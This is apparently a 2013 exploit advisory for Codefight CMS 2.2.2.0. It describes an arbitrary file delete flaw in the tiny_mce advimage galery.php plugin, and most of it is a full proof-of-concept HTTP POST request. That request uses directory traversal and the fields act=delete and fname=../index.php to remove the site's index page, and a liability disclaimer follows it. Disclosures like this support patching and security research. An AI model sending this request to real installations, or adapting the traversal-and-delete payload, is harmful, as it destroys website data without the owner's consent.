##########################################
# Exploit Title: Codefight CMS (tiny_mce) Arbitrary File Delete Vulnerability
# Date: 2013-03-12
# Author: DaOne aka Mocking Bird
# Software Link: http://codefight.org/
# Category: webapps/php
# Version: 2.2.2.0 + old versions
##########################################
# PoC
Example to delete index.php
POST /codefight-2.2.2.0/skin/admin/default/js/tiny_mce/plugins/advimage/galery.php?dirname=../../../../../../../media/ HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/codefight-2.2.2.0/skin/admin/default/js/tiny_mce/plugins/advimage/galery.php?
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------30060290783402
Content-Length: 402
-----------------------------30060290783402\r\n
Content-Disposition: form-data; name="upload"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------30060290783402\r\n
Content-Disposition: form-data; name="act"\r\n
\r\n
delete\r\n
-----------------------------30060290783402\r\n
Content-Disposition: form-data; name="fname"\r\n
\r\n
../index.php\r\n
-----------------------------30060290783402--\r\n
-end-
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information